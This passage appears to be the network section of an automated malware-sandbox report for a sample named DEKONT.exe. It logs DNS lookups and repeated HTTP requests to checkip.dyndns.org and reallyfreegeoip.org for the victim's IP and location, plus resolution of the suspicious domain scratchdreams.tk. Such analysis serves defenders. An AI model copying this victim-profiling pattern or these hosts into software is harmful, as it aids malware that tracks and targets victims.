Apr 24, 2024 10:12:04.925591946 CEST	192.168.2.8	1.1.1.1	0xd724	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:16.139307976 CEST	192.168.2.8	1.1.1.1	0x13ee	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:17.604257107 CEST	192.168.2.8	1.1.1.1	0x13ee	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 10:12:03.312304974 CEST	1.1.1.1	192.168.2.8	0x32bc	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 10:12:03.312304974 CEST	1.1.1.1	192.168.2.8	0x32bc	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:03.312304974 CEST	1.1.1.1	192.168.2.8	0x32bc	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:03.312304974 CEST	1.1.1.1	192.168.2.8	0x32bc	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:03.312304974 CEST	1.1.1.1	192.168.2.8	0x32bc	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:03.312304974 CEST	1.1.1.1	192.168.2.8	0x32bc	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:05.176920891 CEST	1.1.1.1	192.168.2.8	0xd724	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:05.176920891 CEST	1.1.1.1	192.168.2.8	0xd724	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:17.819188118 CEST	1.1.1.1	192.168.2.8	0x13ee	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:17.819188118 CEST	1.1.1.1	192.168.2.8	0x13ee	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:17.819236994 CEST	1.1.1.1	192.168.2.8	0x13ee	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:12:17.819236994 CEST	1.1.1.1	192.168.2.8	0x13ee	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	193.122.6.168	80	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:12:03.624500990 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 24, 2024 10:12:04.560245991 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:04 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0789c963ee3212b49ed8fc94342d2e31 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>
Apr 24, 2024 10:12:04.571971893 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 24, 2024 10:12:04.876972914 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:04 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 753284cc504c920348533eaaed73497d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>
Apr 24, 2024 10:12:05.906738997 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 24, 2024 10:12:06.250719070 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:06 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: af4f5d487a7512b77fedaadf957af114 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	193.122.6.168	80	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:12:07.288696051 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 24, 2024 10:12:07.803047895 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:07 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 09594c32db6b4ab1023d6e07dcf1e4b7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	193.122.6.168	80	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:12:08.823833942 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 24, 2024 10:12:09.919146061 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:09 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e0318c95c0275f56c1eee2db5e60bb38 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49717	193.122.6.168	80	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:12:10.942965984 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 24, 2024 10:12:11.251729012 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:11 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1b912b367de582f8085bef85682934ae Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49719	193.122.6.168	80	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:12:12.270056009 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 24, 2024 10:12:12.676800966 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:12 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 90390c58b7b48ab3c4d5e64b12dcd028 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	193.122.6.168	80	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:12:13.696244001 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 24, 2024 10:12:14.082504034 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:13 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0a3b45e37446e3e39160719de357c276 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49723	193.122.6.168	80	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:12:15.103277922 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 24, 2024 10:12:15.409518957 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:15 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 89634fd3524771b377b26b7f185bd2a7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49709	104.21.67.152	443	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:12:05 UTC	86	OUT	GET /xml/154.16.105.36 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-24 08:12:05 UTC	712	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:05 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10977 Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pIv%2BT6e02dS6LTiaA11JFmMQ%2B2OM904wiZGN6Kpcr9ZsS5E6gEqQH1UnN6%2BIuxQvz%2FWEArNoPNQDEnrcz2wqy0r%2FMFbFmpsP8oe9WjwHnI4xMEabUIak78h2I%2BCdpuaGlk9olOlP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794a0584e1e7bfb-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:12:05 UTC	368	IN	Data Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
2024-04-24 08:12:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	104.21.67.152	443	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:12:06 UTC	62	OUT	GET /xml/154.16.105.36 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-24 08:12:06 UTC	706	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:06 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10978 Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tzzpmQtV6HUzJJpSBiQVe%2BSRIa58kDjkALkxIg05miifHoGw%2FmhETjxwC7vkXiWe6aS7z1Ut62SE7PfgbvB8S3IgIeroLXCTprJjQ5vBpfps5Nq%2B9wiUdnJy8D0d1eIYIp8rCdl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794a05eeb930fe3-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:12:06 UTC	368	IN	Data Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
2024-04-24 08:12:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49714	104.21.67.152	443	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:12:08 UTC	86	OUT	GET /xml/154.16.105.36 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-24 08:12:08 UTC	702	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10980 Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x227bsT7jjHOMic2Qc0m5Mxdgm0KZIi2rJOV2zMt41BPh4zH48M4hih94JH82aENtl97snxQ2sbufyL2gXijdLI38lWFnB6SOAndCQzPufqRn6T%2BwMeCwOJPDHk7yceYYl1RCCXN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794a068ab720924-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:12:08 UTC	368	IN	Data Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
2024-04-24 08:12:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49716	104.21.67.152	443	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:12:10 UTC	86	OUT	GET /xml/154.16.105.36 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-24 08:12:10 UTC	704	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10982 Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ywnDnoYQavWKsHPfOt0LGdGcHLr5yIlzo3tUA66vsWmbjBmbr12aM%2FzfOZixJ5YLhgePRMvK8k3p3piS5MB8GvtOoEmsi8AL0O8lJRbGJejH7GJzis618ahHEqQRVg6%2B7dnKzxu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794a075dd3478d7-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:12:10 UTC	368	IN	Data Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
2024-04-24 08:12:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49718	104.21.67.152	443	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:12:11 UTC	86	OUT	GET /xml/154.16.105.36 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-24 08:12:11 UTC	704	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10983 Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pbhsf6ioPlbyAc9eHsfVa%2FKRtBAU7PSkYp7lf3pXYMsAKaQIMiRg9qTNnszBOHEtUHdtuGIKnjTIzkTVQathxqiLSOxqIpKXhplU6h9vBoLY7tLPJJP9vCMh%2FhSDpBPXaccsIOY7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794a07e2cab14e6-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:12:11 UTC	368	IN	Data Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
2024-04-24 08:12:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49720	104.21.67.152	443	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:12:13 UTC	86	OUT	GET /xml/154.16.105.36 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
